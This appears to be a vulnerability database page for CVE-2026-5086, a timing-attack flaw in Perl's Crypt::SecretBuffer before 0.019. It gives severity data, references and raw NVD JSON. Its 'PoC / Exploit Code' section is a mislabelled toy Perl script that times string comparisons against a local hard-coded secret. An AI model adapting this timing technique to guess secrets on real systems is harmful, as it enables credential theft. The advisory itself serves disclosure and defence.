CVE-2026-5086

Description

Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks. For example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nerdvana:crypt\:\:secretbuffer:*:*:*:*:*:perl:*:* - VULNERABLE

Crypt::SecretBuffer < 0.019

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/perl
use strict;
use warnings;
use Time::HiRes qw(time);

# Simulate vulnerable comparison in Crypt::SecretBuffer < 0.019
sub vulnerable_compare {
    my ($secret, $input) = @_;
    # Vulnerability: Uses standard string comparison which returns early
    return $secret eq $input;
}

my $secret_buffer = "sensitive_secret_key_123";
my @test_inputs = (
    "a",                    # Wrong first char
    "s",                    # Correct first char
    "se",                   # Correct first two chars
    "wrong_guess_xxxxxxxxx" # Completely wrong
);

print "Measuring timing differences (microseconds):\n";
foreach my $input (@test_inputs) {
    my $start = time();
    vulnerable_compare($secret_buffer, $input);
    my $elapsed = (time() - $start) * 1_000_000;
    printf "Input: %-25s Time: %.4f us\n", $input, $elapsed;
}

# Analysis:
# If 's' takes longer than 'a', and 'se' takes longer than 's',
# an attacker can confirm correct characters sequentially.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5086
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5086
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5086/
[4] VulDB https://vuldb.com/cve/CVE-2026-5086
[5] https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes
[6] http://www.openwall.com/lists/oss-security/2026/04/13/12

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5086", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-13T23:16:27.990", "lastModified": "2026-05-06T17:16:49.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks.\n\nFor example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nerdvana:crypt\\:\\:secretbuffer:*:*:*:*:*:perl:*:*", "versionEndExcluding": "0.019", "matchCriteriaId": "93A2172E-D859-484C-BF39-687B58BCC991"}]}]}], "references": [{"url": "https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product", "Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory", "Mailing List"]}]}}